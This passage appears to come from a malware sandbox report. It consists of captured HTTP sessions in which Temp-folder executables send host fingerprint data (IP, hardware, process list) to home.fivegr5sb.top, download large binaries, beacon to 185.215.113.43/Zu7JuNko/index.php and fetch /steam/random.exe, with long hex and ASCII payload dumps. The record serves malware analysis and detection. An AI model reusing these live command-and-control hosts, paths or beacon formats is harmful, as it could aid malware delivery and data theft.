                                                                                                                                                                                              Dec 16, 2024 01:02:14.569591045 CET776INData Raw: ee dd 52 cb de db a4 82 9d 12 c6 5b b8 87 92 ba 9f 7f 13 5a 2f a0 f0 ac e8 a6 b3 14 b0 42 19 ba 71 cc 52 ce 8e be 28 08 3a 92 c7 d8 65 03 f5 08 ab d6 9c bc 1f 10 24 e3 d6 4a 30 f4 d8 9f 7a 8b f7 df 40 e2 6e ff ef 59 bc 0d 19 d4 b7 9e 57 99 b4 34
                                                                                                                                                                                              Data Ascii: R[Z/BqR(:e$J0z@nYW4^0rV/\eB&O7{V,'xY9Sb"BTW'{1UQ=Xk'myXvq^&YK6FY#Ms
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569607973 CET1236INData Raw: 36 25 de ec e2 6f 0d 4d c0 04 b5 da 41 68 71 0a 90 ff 95 fe a8 d2 b1 54 4c 2f 72 60 08 db 88 e0 8f 3e f7 44 8c 1f fa 3f 05 53 ba 73 32 be 40 e3 c4 5d bc cf d1 23 f6 9a f4 f3 99 ae 7e 03 c3 1b 28 33 2f 37 2e 6d 54 05 e6 6f 48 38 5f 7d e2 13 cf 49
                                                                                                                                                                                              Data Ascii: 6%oMAhqTL/r`>D?Ss2@]#~(3/7.mToH8_}I7B[fFo$H&jTdVO~b!8Vh-%HbNYq]%ql"(2 $jya(M{;[`+`uv1CV+2}qNe)g4
                                                                                                                                                                                              Dec 16, 2024 01:02:14.570115089 CET1236INData Raw: b0 61 f6 6a 18 62 c7 0a c2 b2 63 d6 b0 14 e1 cd 6e 58 99 7b e5 ef 27 2b 01 fd d4 d1 ad ae 92 41 c7 2e 5b 98 f1 9e db bb dc e5 65 d2 f8 50 2e 0c 9b 69 e2 b2 9a 50 9a 63 47 5f 05 72 67 2e dd 58 ab 09 47 e8 e7 6a 23 97 6d 3b 48 ec 23 98 12 b1 97 cc
                                                                                                                                                                                              Data Ascii: ajbcnX{'+A.[eP.iPcG_rg.XGj#m;H#2O-[[}Zh2Hk\pQt=R%dk_xXSVZ/JM|_dU*g/kO$_Xsisc n.QnC`io-RYy@
                                                                                                                                                                                              Dec 16, 2024 01:02:14.570131063 CET1236INData Raw: 54 88 dd f2 30 9b e1 cf 58 35 13 4b de af 29 ec f2 30 17 eb 6e 30 ba ce 0d 6c d4 2a 49 82 1b 37 53 c5 6a cf a7 a6 cf e4 be c1 23 b6 b1 09 d7 cb 93 51 b1 b2 0b 68 fb 5a bf bf 59 42 6b 98 58 53 ae ca 4b ce 60 a5 eb 52 73 c3 06 74 ab 5c ac de 16 7f
                                                                                                                                                                                              Data Ascii: T0X5K)0n0l*I7Sj#QhZYBkXSK`Rst\AE`b7*qG\Un}up")p&.nVO))E(8B)G MqBE$>,g#@5L:CB2G%_
                                                                                                                                                                                              Dec 16, 2024 01:02:14.689241886 CET1236INData Raw: 1e 04 dc ce 33 0b 2d ce c4 80 52 9b 05 07 18 54 0c 04 93 62 71 f5 12 c0 f6 3e 9d 1f 6e 41 a3 83 f0 d3 15 31 48 70 99 12 72 7d c8 b8 bf 7d 7b d6 ef 62 e1 f5 bc 9b 09 10 a7 59 ba 04 f6 c9 16 50 2c c4 4c 0b bf 46 ee ab ef 63 fc 54 fa 05 69 bb 6e 8c
                                                                                                                                                                                              Data Ascii: 3-RTbq>nA1Hpr}}{bYP,LFcTin!mN>]N-VH5IaL1W8+B(dn:5WN4Yk'DVC{9F:%B?fqb^@]K~5Scv~z$=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              17192.168.2.449935141.8.192.141801104C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:14.581191063 CET12360OUTPOST /kJZQfgRLErzqwUgdaDCN1734167391 HTTP/1.1
                                                                                                                                                                                              Host: home.fivegr5sb.top
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Content-Length: 441684
                                                                                                                                                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 33 30 37 33 32 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734307327", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701239109 CET2472OUTData Raw: 33 37 52 34 4b 5c 2f 53 75 38 41 66 70 45 5a 6c 6e 57 54 2b 44 76 48 76 2b 75 47 59 38 4f 34 48 44 35 6e 6e 47 47 5c 2f 31 58 34 30 34 66 38 41 71 65 42 78 57 49 65 46 6f 56 5c 2f 61 38 55 63 4f 35 4a 51 78 48 50 58 54 70 2b 7a 77 74 53 76 56 68
                                                                                                                                                                                              Data Ascii: 37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5nnGG\/1X404f8AqeBxWIeFoV\/a8UcO5JQxHPXTp+zwtSvVh8U6cYe8fkHi99GXxv8AAbL8nzXxX4J\/1VwGfY2vl2U4j\/WThHPPreMw1BYmvR9nw3n2cVqHJQkp8+Jp0aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/X\/Po2rFfsH\/wTG\/Yl+CH7W
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701267958 CET2472OUTData Raw: 2f 48 79 76 38 50 38 5c 2f 57 72 6b 30 66 37 7a 5a 7a 73 38 72 7a 66 38 63 64 50 36 31 54 5c 2f 77 42 57 75 39 30 6a 66 79 5c 2f 39 61 66 4e 5c 2f 70 30 5c 2f 44 38 71 44 53 6e 31 2b 58 36 6a 50 4d 54 35 45 33 37 50 33 76 5c 2f 50 58 39 77 50 38
                                                                                                                                                                                              Data Ascii: /Hyv8P8\/Wrk0f7zZzs8rzf8cdP61T\/wBWu90jfy\/9afN\/p0\/D8qDSn1+X6jPMT5E37P3v\/PX9wP8ARf8A9XP0pi\/vNjv5bv8A8sh\/yw9+nv8An3p5V5P+W2xP0h7Y\/H2+nvTM7m2J5mzyv+Wf\/LY\/p\/k96DeG\/wAv1RD\/AN+3k\/7df8\/0we9H+5J9+X97Hz5+af8AJw\/+ofrLzj1\/zxR5byf65+I+OP8A
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701364040 CET2472OUTData Raw: 43 56 30 2b 5c 2f 74 37 76 51 74 4e 6b 38 4d 36 68 6f 63 73 55 75 74 61 5a 65 77 57 75 6f 6e 78 42 66 2b 49 4c 66 56 37 58 54 39 54 74 4a 6c 5a 4c 71 31 75 37 6d 32 30 65 7a 5c 2f 67 44 6a 72 77 5c 2f 7a 62 4e 50 46 54 6a 69 4f 57 34 76 43 35 50
                                                                                                                                                                                              Data Ascii: CV0+\/t7vQtNk8M6hocsUutaZewWuonxBf+ILfV7XT9TtJlZLq1u7m20ez\/gDjrw\/zbNPFTjiOW4vC5PTea4WrRx2Oq4vB4PHZnneHy7GYbKoYnC4evB43FPHSqUaOIUaU\/Y1LtcknH\/VTwu8R+H8v8EvD2ecYStndWhkGOhWy3B0cFjcwwWU8OY3MsuxWbLCYvEYeosHhFl8YVauGbqwVamlF+0ip\/osnwLl0rTWPhzxZ
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701390982 CET2472OUTData Raw: 2f 73 32 61 35 34 44 30 72 52 37 6a 77 31 34 45 38 4b 65 42 5c 2f 48 74 5c 2f 62 51 66 43 71 7a 30 44 77 32 2b 70 58 55 46 74 71 46 6c 65 51 78 2b 49 39 65 76 49 49 42 65 57 6d 70 61 58 44 70 39 33 72 76 69 64 62 7a 56 4e 5a 31 6e 38 37 50 2b 43
                                                                                                                                                                                              Data Ascii: /s2a54D0rR7jw14E8KeB\/Ht\/bQfCqz0Dw2+pXUFtqFleQx+I9evIIBeWmpaXDp93rvidbzVNZ1n87P+CsGW\/bk+KuOdujfDJfp\/wAWz8Jt\/wCzV+i\/Rr4UwvDPjbw1j8mznBZzkXFXBvFOOwWIy15isPhpYTGzwWOySrPMsJl+Lxs8rxOEo2x1TA4aljqdTDYyjRgpqMfxP6YHFWJ4m+j1xRgM5ybGZPn3CvHPB+CxmHz
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701419115 CET2472OUTData Raw: 68 62 2b 2b 76 6c 5c 2f 77 44 50 58 79 35 4a 76 39 56 5c 2f 30 36 5c 2f 35 39 66 53 6a 79 5c 2f 33 63 79 66 76 45 53 65 4c 39 33 6a 38 76 5c 2f 77 42 66 5c 2f 77 43 75 70 74 76 6d 4b 58 32 62 34 5a 50 39 56 36 66 2b 41 6e 76 30 39 66 53 71 75 35
                                                                                                                                                                                              Data Ascii: hb++vl\/wDPXy5Jv9V\/06\/59fSjy\/3cyfvESeL93j8v\/wBf\/wCuptvmKX2b4ZP9V6f+Anv09fSqu5Nv8GyP975f+f8A6309eX2fn+H\/AAToFeTbJMj\/ACP5Q83zP8\/\/AK+PpUMe9bfY\/wDyzNx5vBz9e\/8An8qubsq6f6n\/AJa\/u8\/\/AKv88elU5P3cjo4uIH\/0iKXy+fT\/AOtWhpT6\/L9Q8t2kf5d\/l
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701483965 CET2472OUTData Raw: 6e 68 34 50 46 55 63 52 54 6a 69 45 33 57 69 66 6d 70 2b 78 54 38 54 50 69 62 38 52 76 42 66 78 68 48 69 58 52 39 49 30 37 34 63 36 42 65 72 59 66 44 67 61 50 6f 75 6b 65 48 37 50 54 46 6d 54 56 72 37 56 5c 2f 44 73 64 6a 70 46 6a 5a 77 58 44 57
                                                                                                                                                                                              Data Ascii: nh4PFUcRTjiE3Wifmp+xT8TPib8RvBfxhHiXR9I074c6BerYfDgaPoukeH7PTFmTVr7V\/DsdjpFjZwXDWNtc6Ld3M7DMFzfOqtIlwqwdFX6U+JdH0pPDetxxafaW6tZXspFtBHbEyyozSSEwLGWeRvmdmyXbl8mvz9uNCQ5eCYr3KzDK\/wDfagFQPdW9zX8n554ncP8AFmeY3NKOULhehip0\/Z5fSf1nDUnChRpSm69KFOU6
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701513052 CET2472OUTData Raw: 47 75 70 70 6e 35 4f 5c 2f 38 46 57 44 6e 39 75 54 34 74 44 2b 37 70 58 77 77 48 5c 2f 6d 4c 66 42 78 5c 2f 72 58 39 4c 76 37 4e 6e 37 4c 66 77 62 5c 2f 5a 51 38 43 74 34 44 2b 44 5c 2f 68 32 58 54 72 61 5c 2f 75 55 31 4c 78 4e 34 6b 31 69 36 5c
                                                                                                                                                                                              Data Ascii: Guppn5O\/8FWDn9uT4tD+7pXwwH\/mLfBx\/rX9Lv7Nn7Lfwb\/ZQ8Ct4D+D\/h2XTra\/uU1LxN4k1i6\/tbxj401pYzGda8V688UMmoXhDymC1t4LLR9O+0XKaTpmnxXEsb\/zPf8ABVU5\/bn+MA\/u6d8Lx\/5ijwSf61+g\/Rs4gynM\/GzhLIuG6eLjw3wnwTxLlmW4nMadOjmOb4nF15Znm2d47D0auIpYOePxuKlDC4
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701544046 CET2472OUTData Raw: 66 50 6e 7a 52 2b 36 2b 76 49 5c 2f 7a 2b 47 61 49 34 5c 2f 75 66 50 47 50 4d 5c 2f 35 5a 2b 56 5c 2f 35 4b 39 66 38 5c 2f 6a 52 4a 44 43 79 78 76 73 7a 31 5c 2f 77 41 5c 2f 35 5c 2f 58 75 65 58 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36
                                                                                                                                                                                              Data Ascii: fPnzR+6+vI\/z+GaI4\/ufPGPM\/5Z+V\/5K9f8\/jRJDCyxvsz1\/wA\/5\/XueXIsab0kmT\/W++fXr6f5PfP2fn+H\/BL535f18yGRnYu7vsH+r\/1Vtn\/P6f1Zt3b3dPJeT\/P0745\/pT0jG1\/3MezH8f04tf8Ar+70yTPmP\/7T\/cQen19+tZmoyPZ5h353\/wCql\/8Akr8P6UwSFvnR8v8A88\/+nfHpnr0p+5Pn
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701606035 CET2472OUTData Raw: 39 63 73 53 7a 62 76 4a 74 41 31 4c 53 66 46 50 6a 4c 34 66 2b 41 39 45 38 51 2b 46 32 38 51 5c 2f 45 76 34 67 2b 43 5c 2f 68 70 34 61 46 5c 2f 72 6b 55 47 6e 6a 78 48 34 37 31 2b 78 38 4e 36 49 32 6f 7a 61 66 42 71 74 39 44 59 4c 71 4f 6f 51 4e
                                                                                                                                                                                              Data Ascii: 9csSzbvJtA1LSfFPjL4f+A9E8Q+F28Q\/Ev4g+C\/hp4aF\/rkUGnjxH471+x8N6I2ozafBqt9DYLqOoQNeS2emX91HbiR7ezuZQkD8roPxA8M69FdtBrGjLLZ6xqmhyxpqtu6y3ukXTWl0bXz1tbiWEyoTEz2sMhQqXijYlB+I4Xwb+jtg+LuShwfwn\/rJWwcs0jldaeJxWA+p069OhLFUMhxWKrZBSjCvUpU\/wBxgIThKcL
                                                                                                                                                                                              Dec 16, 2024 01:02:14.701653957 CET2472OUTData Raw: 56 5c 2f 34 58 30 72 54 34 70 35 35 62 4b 4c 77 76 72 71 61 48 72 6d 75 53 65 47 76 47 32 70 61 58 34 52 31 78 4c 48 58 4c 79 4f 7a 72 66 5c 2f 73 4c 57 35 4e 5a 6b 30 65 7a 31 44 77 44 71 48 39 6d 66 47 62 34 6c 5c 2f 41 5c 2f 78 6a 71 64 72 34
                                                                                                                                                                                              Data Ascii: V\/4X0rT4p55bKLwvrqaHrmuSeGvG2paX4R1xLHXLyOzrf\/sLW5NZk0ez1DwDqH9mfGb4l\/A\/xjqdr4vv10T4a+Jfgj8OPh98TPjfrvxF1268K22ieH\/Bnwi0v4h2eh+M\/EFvqWqIPFHh\/wAQaZoNtrkD+Gr7xG6vjN4XUYqdbjbJKUHUxFJTqVqkIXw0cvnWnzSpKPsI081y2pHE3+r1KeOw06dWcKsG86P0ffGnEVPZ
                                                                                                                                                                                              Dec 16, 2024 01:02:17.101769924 CET164INHTTP/1.1 200 OK
                                                                                                                                                                                              server: nginx/1.22.1
                                                                                                                                                                                              date: Mon, 16 Dec 2024 00:02:16 GMT
                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                              content-length: 26
                                                                                                                                                                                              Data Raw: 4e 71 53 58 47 4d 54 32 39 62 42 73 6f 4b 76 6d 31 37 33 34 33 30 37 33 33 36
                                                                                                                                                                                              Data Ascii: NqSXGMT29bBsoKvm1734307336


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              18192.168.2.449948141.8.192.141801104C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:17.700459957 CET123OUTGET /kJZQfgRLErzqwUgdaDCN1734167391?argument=NqSXGMT29bBsoKvm1734307336 HTTP/1.1
                                                                                                                                                                                              Host: home.fivegr5sb.top
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199350119 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              server: nginx/1.22.1
                                                                                                                                                                                              date: Mon, 16 Dec 2024 00:02:18 GMT
                                                                                                                                                                                              content-type: application/octet-stream
                                                                                                                                                                                              content-length: 10816560
                                                                                                                                                                                              content-disposition: attachment; filename="9fqAEawLfppvInuhFWM;"
                                                                                                                                                                                              last-modified: Sat, 14 Dec 2024 09:09:51 GMT
                                                                                                                                                                                              cache-control: no-cache
                                                                                                                                                                                              etag: "1734167391.861205-10816560-3349682490"
                                                                                                                                                                                              Data Raw: 61 bb a5 af 91 37 93 e2 ce a6 57 fb bb 37 7b 52 08 7e 81 5e e3 4d 90 f0 ad 46 0d f6 b2 46 c0 ad bf 5b 2a 47 c3 e1 5e 18 63 d1 55 b5 a3 00 2b 29 51 a4 80 25 1c 2e bf b6 d9 af a4 8d 38 d1 52 85 03 6e 3b e3 c6 36 ce 16 fa 12 a2 6b 33 d8 5c 33 fe 44 02 23 20 a7 df e7 d1 a4 7b 50 47 e2 c4 61 39 67 a2 08 99 2d dc 5a fc d6 e8 7c 35 77 31 28 a2 f9 b0 ea 7b 62 47 d1 c8 87 6d 00 c3 8f b5 b5 19 b2 59 dd 11 4d d0 84 c9 83 72 e3 3c f9 b1 a4 69 b4 8b 47 1b f1 ac 3b 3b 19 4c 22 19 2a b4 2f 03 c3 33 fc 07 7e 54 78 f2 b4 b2 ef c8 43 9f aa 63 86 1f 1d 3b 29 93 9b 7a fe d4 53 af d7 a2 25 2e f9 30 6e 16 52 40 3c 7f 87 b3 46 89 99 70 54 9a 87 8b db 9d 57 e3 2b cb fb 2a 95 53 0e c3 23 84 74 f9 50 bc df 62 3e ac 50 34 0b b4 d9 4b f5 50 0d c6 8c 58 18 80 de 61 2f 85 03 a8 cd e4 e3 a7 35 6b 0b 99 be 8c fa c3 f3 10 cd 1f 94 f7 dc d4 01 fe 7a b2 4f f6 c7 69 3a a1 f3 cd b8 31 55 11 bc 8a d5 d5 2c 58 4a 60 44 37 3c 6c a0 49 7f 9f c4 40 0a ec 25 a5 68 86 3a 0c 48 cf 88 21 c1 04 5d 55 02 7f c7 07 eb 95 40 81 73 cc 5b 06 05 0e e7 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: a7W7{R~^MFF[*G^cU+)Q%.8Rn;6k3\3D# {PGa9g-Z|5w1({bGmYMr<iG;;L"*/3~TxCc;)zS%.0nR@<FpTW+*S#tPb>P4KPXa/5kzOi:1U,XJ`D7<lI@%h:H!]U@s[1is-PeHcT*NZ'qm?w6. S#;u4DR/6Jx$qgB%}'7\xa"%|$zrVO`)#,AV"IC>i%pExV?O@%v/yI>0-p-UD=8!N!h*8~>h,hP3iD#bY6x{S%2S;~DF'3:>&X>Iz:M*&/^oLWnF`JH&gC|!E<?A:O:6-X-^u'}0/4^q,lK4RvJ ?{Zd.W{;s(.$[IvU<"tA?x+^Ypp{Wt4fjYdE|(Krxr5I$CtAjLo]
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199392080 CET1236INData Raw: 89 96 4c ba 22 4f e3 a9 bf a1 11 cc b8 a1 e1 3e 2f 3e 1d 33 25 19 4b 91 fe 46 cc ae 11 1d c7 0f 2e 30 47 80 54 aa b5 fd 2b d1 e1 bb ad 80 6e 45 e3 67 5c 20 18 21 66 da 40 16 a2 80 ad 8f 8f cf b2 b5 57 17 27 06 3d c9 57 ad a3 f8 7c 98 24 bb 61 2f
                                                                                                                                                                                              Data Ascii: L"O>/>3%KF.0GT+nEg\ !f@W'=W|$a/Y} }?W+i2+cOi|6br{-<KqFrM^6wJjb[*$A)3*V)iaJ-Nl-ti$9}kS7W=fXC?c%C|q4.
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199429989 CET1236INData Raw: f1 7c 51 a7 55 a9 b7 a9 58 05 c2 09 09 bc f0 ba 08 b7 59 46 a1 d1 a1 ba 94 45 36 dd 2c 4c 8a 82 ba a2 88 7f d9 a7 1a 9c 5e 9b 67 5f 95 c5 92 38 a2 82 8d 03 53 3d a6 47 ec 51 e1 d5 d0 cf 92 51 b1 f7 39 af 99 f3 62 03 2d 4b b9 23 c6 97 d4 00 38 25
                                                                                                                                                                                              Data Ascii: |QUXYFE6,L^g_8S=GQQ9b-K#8%ZEf|dQWrmuC5^HcS%b<jEMAV^U@Bb(Xb-vlY5R;-Dk!o4_M[lT=CqPC].`L
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199548960 CET672INData Raw: 4c 8e 39 42 0d f6 bb 38 be 89 36 8b 6f fa ff cc 71 5f ad 8a 5b 3d 9f da b3 a5 ff 53 88 bd bd b4 d6 bf f1 5f 98 37 4c 76 d1 23 99 a5 8a f3 7b 0a ec 12 7c fa 69 f8 cd 3e a4 37 3c e0 03 1f 2e bc 38 2d b2 4c 17 43 a4 47 52 c6 27 40 74 c1 74 5a 0d 5a
                                                                                                                                                                                              Data Ascii: L9B86oq_[=S_7Lv#{|i>7<.8-LCGR'@ttZZZTrb4<[bZR["@czn[= "q<7:.V!xd-KBFk0?!Nsf__Oj'y
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199584007 CET1236INData Raw: ac a2 7a 03 22 10 65 5b 3e 1c e4 5e 7d 15 00 48 b6 73 64 f4 5e 32 46 02 5a 9f f2 60 1a 28 b2 4d ae 84 6e d3 11 39 8c c1 d5 64 35 25 6d c6 c0 7f 24 ae 5c 4f d5 b9 8a 39 cc 67 55 dc 00 13 1c 49 6b 8d 9a 87 86 ab af 23 ca 59 9b 30 44 fc d7 98 16 4e
                                                                                                                                                                                              Data Ascii: z"e[>^}Hsd^2FZ`(Mn9d5%m$\O9gUIk#Y0DNj2.u3b.Ph/E$y`FY'6Wk+"0"*5&#+GEPG4So,9 K9*$Y?9#Y*Yju}l<WrB<|VyNbg6gl%rft
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199620008 CET224INData Raw: d6 bd 3d 5d 83 a1 c1 d5 6f a9 98 b9 17 89 5f f7 68 dd 01 e1 12 36 2a 18 55 a1 95 8a 0e e8 ee e6 9a 88 b0 e6 b2 67 e6 94 61 da 2d 08 51 8f c2 d7 b0 41 76 57 91 d7 59 46 5a c9 90 84 07 35 ad 6a b9 72 26 be 86 1d 2f e7 b7 76 b2 bc 50 c7 42 35 02 28
                                                                                                                                                                                              Data Ascii: =]o_h6*Uga-QAvWYFZ5jr&/vPB5(vBJX,.rtSkH|jA!2i_S:UO"J]h($9J~b8CH/IEy7/5@qP[$LzO;mDl
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199856043 CET1236INData Raw: ad 10 91 98 1a 71 16 16 ef 1a 2b fd 2d a1 a3 b8 53 a0 63 14 73 46 64 72 06 dc d5 6e ba 07 fe ea 55 13 ca 88 cb e0 0e 6d 31 e5 44 da 6e 62 aa f4 dc 69 65 9d 15 c8 78 0b d5 a3 e4 8d 3c cd e2 1e 60 95 a4 5c 52 9b 5e 0b 0a 67 be 30 f6 8f 2c a5 4a a3
                                                                                                                                                                                              Data Ascii: q+-ScsFdrnUm1Dnbiex<`\R^g0,JPw<8{"9]~9_s&>bus7D`CoQ_];2_[qC{5Q)R."X(K{,#EMEoAT.vyb(7M
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199918032 CET224INData Raw: 6d d9 3e 1c df 1a 65 6b 9b 22 f6 99 3d 19 db b4 fe b3 81 78 94 7e 5f 9a bb 9d 71 07 e8 64 54 19 d5 96 ed 1a d6 66 60 e4 e0 ac 05 9b 8c 9d 1c bb 0a 53 0c bd ca e9 6c 11 ac a7 d2 e7 d0 a8 50 f2 f2 fd 1a b4 6b 07 0d 34 01 b2 99 45 39 ff a5 e3 65 a5
                                                                                                                                                                                              Data Ascii: m>ek"=x~_qdTf`SlPk4E9edN27r5W/}0@*5`M:vIeCMa9N}2D<]g3X/]bEeS:|RpZTLhjr&~/UTA
                                                                                                                                                                                              Dec 16, 2024 01:02:19.199956894 CET1236INData Raw: 70 e4 1c 83 7b 8a 4e 03 8b 4b 48 bc 1b 7f 46 fa bd 66 9e 90 88 12 4b e4 f8 30 72 35 7e e3 98 dd 88 2a 84 e9 ee 59 81 b8 1c 7a ee 80 27 09 21 9d 3e 77 79 71 c4 2d 31 cf 49 b5 71 bb c5 40 2c ed 75 82 7c 4f ed bb 67 c2 06 2e e9 a3 f7 dd 39 3f be 77
                                                                                                                                                                                              Data Ascii: p{NKHFfK0r5~*Yz'!>wyq-1Iq@,u|Og.9?w"_9fV0AMk4y+#(#I6AM`wT2QV.FSrTf)o)+I}* Xl`1h*:L<"at)2}!<H*mkpnAmu
                                                                                                                                                                                              Dec 16, 2024 01:02:19.200067043 CET1236INData Raw: a7 dd e0 c8 fe 1d 82 b7 a1 e4 ec 72 17 e0 fb 0a 60 a4 a6 9d 98 af b7 39 e5 84 23 b2 8b ea b4 71 2e 8f 02 58 64 20 ef 6f d6 0a 71 e6 cd 12 3b 72 de 0d 6c 52 0f 97 62 bf 98 3c c5 da af e0 b7 95 2f 18 ee 1c a6 43 eb b4 cc 51 df 9a 0b 1c 83 ad c2 9b
                                                                                                                                                                                              Data Ascii: r`9#q.Xd oq;rlRb</CQw-qec)F1su"o[n-~l}i&HO8xg&c(>wt;A4M`-GQWuK 9~_058Y/1,u
                                                                                                                                                                                              Dec 16, 2024 01:02:19.319597960 CET1236INData Raw: f0 a6 28 3d 35 78 e6 fb e0 8e 11 b1 e4 b4 ce e9 a5 8b fb fe e2 3d bb 90 ff 0a 49 ab da f3 f2 52 b4 1c 51 ad c1 93 82 e8 3f e7 eb ed 27 2a 46 4c eb 2b c0 1a 47 8f 54 2d df 22 bc 15 85 62 a6 f1 7f 9e 16 12 c6 a8 93 6e 52 a2 73 23 f1 33 9a 66 d2 d8
                                                                                                                                                                                              Data Ascii: (=5x=IRQ?'*FL+GT-"bnRs#3ftD}/xoHHgXm *eIt3:zB:X}KMMu(0GEvc/&VBd!CMaRffwtDW?^K29;zguA


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              19192.168.2.449955185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:20.208183050 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015826001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:21.549935102 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:21 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              20192.168.2.449958185.215.113.16808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:21.688363075 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:02:23.060626030 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:22 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1836544
